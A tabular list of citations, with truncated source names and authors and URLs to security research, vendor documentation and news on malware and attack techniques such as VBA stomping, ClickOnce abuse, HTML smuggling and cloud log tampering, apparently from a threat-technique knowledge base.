ATTACK IQFederico Qu https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
TrendMicr Trend Micrhttps://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info
Bleepingc Abrams, L. https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-r
AWS InstanAmazon. (n.https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
Securelist Dedola, G. https://securelist.com/transparent-tribe-part-1/98127/
FBI RagnarFBI. (2020 https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-r
Microsoft Microsoft. https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=wi
Sophos GeoWisniewski,https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
FireEye VBCole, R., Mhttps://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.htm
Evil Clipp Hegt, S. (2 https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/
Microsoft Microsoft. https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7
Walmart RoSayre, K., https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278
pcodedmpBontchev, https://github.com/bontchev/pcodedmp
oletools todecalage2.https://github.com/decalage2/oletools
CTU BITS MCounter Thr https://www.secureworks.com/blog/malware-lingers-with-bits
Symantec Florio, E. https://www.symantec.com/connect/blogs/malware-update-windows-update
PaloAlto UHayashi, K https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/
Microsoft IMicrosoft. https://technet.microsoft.com/library/dd939934.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/aa362813.aspx
Mondok WiMondok, M. https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background
LOLBAS MsLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Msbuild/
Microsoft Microsoft. https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-eleme
MSDN MSBu Microsoft. https://msdn.microsoft.com/library/dd393574.aspx
CrowdStrikBart Lenaehttps://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/
Microsoft Microsoft Thttps://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defendi
Microsoft AMicrosoft. https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute
Fifield Bl David Fifi http://www.icir.org/vern/papers/meek-PETS-2015.pdf
RFC826 ARPlummer, Dhttps://tools.ietf.org/html/rfc826
Sans ARP SSiles, R. ( https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411
Stopping CAmazon Web https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cl
AWS Update AWS. (n.d.)https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html
Following tDan Whalen. https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/
ConfiguringGoogle. (n.https://cloud.google.com/logging/docs/audit/configure-data-access
Dark ReadiKelly Sheri https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in
az monitorMicrosoft. https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monit
Pacu DetecRhino Securhttps://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
Hidden VNHutchins, https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html
Anatomy ofKeshet, Li https://securityintelligence.com/anatomy-of-an-hvnc-attack/
PowerShellWheeler, S.https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerS
LOLBAS /DfLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
Microsoft Microsoft. https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=v
SpectorOpNick Powers https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-executi
NetSPI Cli Ryan Gandrhttps://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love
Burke/CISAWilliam J. https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abu
Burke/CISAWilliam Jo https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abu
Zscaler AP Singh, S. a https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses
LatrodectuProofpointhttps://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
DFIR ReporThe DFIR Re https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
AppInit RegMicrosoft. https://support.microsoft.com/en-us/kb/197571
AppInit Se Microsoft. https://msdn.microsoft.com/en-us/library/dn280412
ThreatPostO'Donnell, https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
Sysdig CrypMiguel Herhttps://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
PegasusCitBill Marczahttps://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
NationsBuyNicole Perlhttps://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.ht
ESET GazerESET. (2017https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Screensaver
AWS IAM CAWS. (n.d.)https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition.html
GCP IAM Co Google Clou https://cloud.google.com/iam/docs/conditions-overview
JumpCloudJumpCloud.https://jumpcloud.com/support/get-started-conditional-access-policies
Microsoft Microsoft. https://learn.microsoft.com/en-us/entra/identity/conditional-access/overview
Okta ConditOkta. (2023https://support.okta.com/help/s/article/Conditional-access-based-on-device-security-posture?language
Sysdig ScarAlessandrohttps://sysdig.com/blog/scarleteel-2-0/
AWS SecreAWS. (n.d. https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html
Google CloGoogle Clou https://cloud.google.com/secret-manager/docs/view-secret-details
Microsoft Microsoft. https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli
Wired UberAndy Greenb https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/
Krebs Ado Brian Kreb https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
Linux Pass The Linux https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
nixCraft - Vivek Gite https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
SSH in Wi Microsoft. https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh
GDS Linux IMcNamara,https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.h
DD Man Kerrisk, M http://man7.org/linux/man-pages/man1/dd.1.html
Krebs AcceBrian Krebshttps://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/
CrowdStrikCrowdStrikhttps://www.crowdstrike.com/blog/access-brokers-targets-and-worth/
CISA KarakCybersecurihttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a
Microsoft Microsoft. https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-t
Killing the Sebastian 'https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf
Killing IOS Ang Cui, Jahttps://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf
Cisco IOS SGeorge Noshttp://2015.zeronights.org/assets/files/05-Nosenko.pdf
Cisco IOS Felix 'FX' https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf
Juniper NeGraeme Neil https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES
ADSecuritySean Metcal https://adsecurity.org/?p=2011
Mitiga Ariel Szarf https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
TrendMicroDavid Fiserhttps://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-e
SharepointMicrosoft. https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwid
CybernewsVilius Petk https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
Talos - Cis Nick Biasinhttps://blog.talosintelligence.com/recent-cyber-attack/
NCC GroupPantazopouhttps://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/
Malwarebyt Arntz, P. https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/
Delpy MimiDelpy, B. https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
Microsoft CMicrosoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea
passcape WPasscape. https://www.passcape.com/windows_password_recovery_vault_explorer
Elastic CU Daniel Ste https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
Invictus I Invictus IR https://www.invictus-ir.com/news/ransomware-in-the-cloud
Huntress MJohn Hammo https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
Ossmann StMichael Oshttps://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html
Aleks Wea Nick Aleks.https://www.youtube.com/watch?v=lDvf4ScWbcQ
McMillan Robert McMi https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-h
Frisk DMA Ulf Frisk. https://www.youtube.com/watch?v=fXthwl6ShOg
DOJ - Cisc DOJ. (2020https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network
Data DestruMimoso, M. https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/
Dell Skelet Dell Securehttps://www.secureworks.com/research/skeleton-key-malware-analysis
AWS EBS SnAmazon Web https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html
TLDRSec AW Clint Gible https://tldrsec.com/p/blog-lesser-known-aws-attacks
Azure SharDelegate achttps://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signatur
Azure BlobMicrosoft https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview
Microsoft Microsoft. https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview
Outlflank Hegt, S. ( https://outflank.nl/blog/2018/08/14/html-smuggling-explained/
MSTIC NOBMicrosoft https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nob
HTML Smugg Subramaniahttps://www.menlosecurity.com/blog/new-attack-alert-duri
nccgroup SWarren, R.https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
dump_pwdMetcalf, S https://adsecurity.org/?p=2053
store_pwdMicrosoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-pa
how_pwd_r Teusink, N.http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
how_pwd_r Teusink, N.http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
Twitter Ri Ackroyd, R.https://x.com/rfackroyd/status/1639136000755765254
Invoke-ObfBohannon,https://github.com/danielbohannon/Invoke-Obfuscation
Invoke-DOSBohannon,https://github.com/danielbohannon/Invoke-DOSfuscation
Malware MBromiley, https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16
Akamai JS Katz, O. ( https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation
BashfuscatLeFevre, A https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html
Microsoft Microsoft. https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_e
RC PowerSh Red Canary.https://redcanary.com/threat-detection-report/techniques/powershell/
Microsoft SRussinovichhttps://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
Shadowserv Adair, S., http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websit
Volexity O Lassalle, D https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploita
AWS SysteAWS. (n.d. https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html
Microsoft Microsoft. https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview
Debian Man Debian Polihttps://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact
Windows AGlobal Res https://securelist.com/operation-applejeus/87553/
Microsoft IMicrosoft. https://learn.microsoft.com/windows/win32/msi/installation-procedure-tables-group
wardle evilPatrick Warhttps://objective-see.com/blog/blog_0x59.html
Installer P Rich Troutohttps://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-P
Microsoft Microsoft. https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)
SANS BrianWiltse, B.. https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security
RedxorblueHawkins, J http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html
MalwareByt Segura, J. https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-mal
ProofpointRaggi, M. https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-techn
CiberseguriPedrero, R.https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/
Anomali TeIntel_Acquihttps://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-te
Talos Templ Baird, S. e https://blog.talosintelligence.com/2017/07/template-injection.html
ryhanson pHanson, R. https://github.com/ryhanson/phishery
Apple DeveApple. (20 https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Ch
Ubuntu MaCanonical Lhttp://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html
IranThreatIran Threathttps://iranthreats.github.io/resources/attribution-flying-rocket-kitten/
Intezer H Sanmillan, https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/
BlackHat AAtkinson, Jhttps://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Tok
Microsoft Microsoft Thttps://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx
Microsoft Microsoft Thttps://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx
Microsoft Microsoft Thttps://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx
PentestlabnetbiosX. ( https://pentestlab.blog/2017/04/03/token-manipulation/
GCN RSA J Jackson, Wihttps://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/
Mandiant Mandiant. https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf
Awesome Ex Alexandre https://github.com/dhondta/awesome-executable-packing
ESET FinFi Kafka, F. ( https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
CrowdStrikCrowdstrike http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf
Brazking-WShahar Tavhttps://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/
VB .NET Ma.NET Team.https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/
Default VBKellie Eick https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-
Microsoft Microsoft. https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)
Microsoft Microsoft. https://docs.microsoft.com/office/vba/api/overview/
VB MicrosoMicrosoft. https://docs.microsoft.com/dotnet/visual-basic/
Wikipedia Wikipedia. https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
MalwareTeHutchins, M https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html
FireEye BooAndonov, Dhttps://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html
ESET ComRFaou, M. ( https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_gr
airwalk ba airwalk. (2 http://www.ouah.org/backdoors.html
freedesktoFree Desktohttps://www.freedesktop.org/software/systemd/man/systemd.service.html
Berba huntPepe Berba. https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron
Rapid7 SerRapid7. (20https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence
lambert syTony Lambe https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/
RDP HijackKorznikov, http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
Kali RedsnaNCC Grouphttps://github.com/nccgroup/redsnarf
Symantec W Symantec Th https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
Free DesktFree Desktohttps://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html
Free DesktFree Deskt https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html
Red CanaryTONY LAMBE https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/
TrendMicroChen, J., e https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-s
Azure AD GMicrosoft. https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operati
Azure - Re Microsoft. https://docs.microsoft.com/en-us/rest/api/resources/
Azure - St Microsoft. https://github.com/Azure/Stormspotter
GitHub PacRhino Securhttps://github.com/RhinoSecurityLabs/pacu
CISA AR21 CISA. (202 https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a
apple docoApple Inc. https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introductio
macOS APTJaron Brad https://themittenmac.com/what-does-apt-activity-look-like-on-macos/
Office 265 Microsoft. https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-
AWS Consol Amazon. (n.https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-s
Google Co Google. (20https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard
FireEye TL Vaish, A. https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique
CheckpointCheck Pointhttps://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/
hashereza hasherezade https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_finger
AlKhaser DNoteworthy. https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug
wardle evilPatrick Warhttps://objective-see.com/blog/blog_0x60.html
ProcessHacProcessHack https://github.com/processhacker/processhacker
vxundergr vxundergrou https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug
Mac Backdo Dan Goodin. https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/
Re-Open wApple. (20 https://support.apple.com/en-us/HT204005
MalwareByArntz, P. ( https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it
Atlas SEO Atlas Cyberhttps://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-r
Sophos GooSzappanos,https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/
DFIR ReporThe DFIR Rhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
ZScaler SE Wang, J. ( https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
Chexmarx-Yehuda Gelhttps://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
Checkmarx-Yehuda Gelb https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-cha
FireEye DL Amanda Stew https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading
T1105: Tre Mathanrajhttps://www.trellix.com/blogs/research/beyond-file-search-a-novel-method/
t1105_lolbLOLBAS. (nhttps://lolbas-project.github.io/#t1105
PTSecurityPositive Tehttps://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf
4 - appv John Fokkerhttps://www.trellix.com/en-ca/about/newsroom/stories/research/suspected-darkhotel-apt-activity-upd
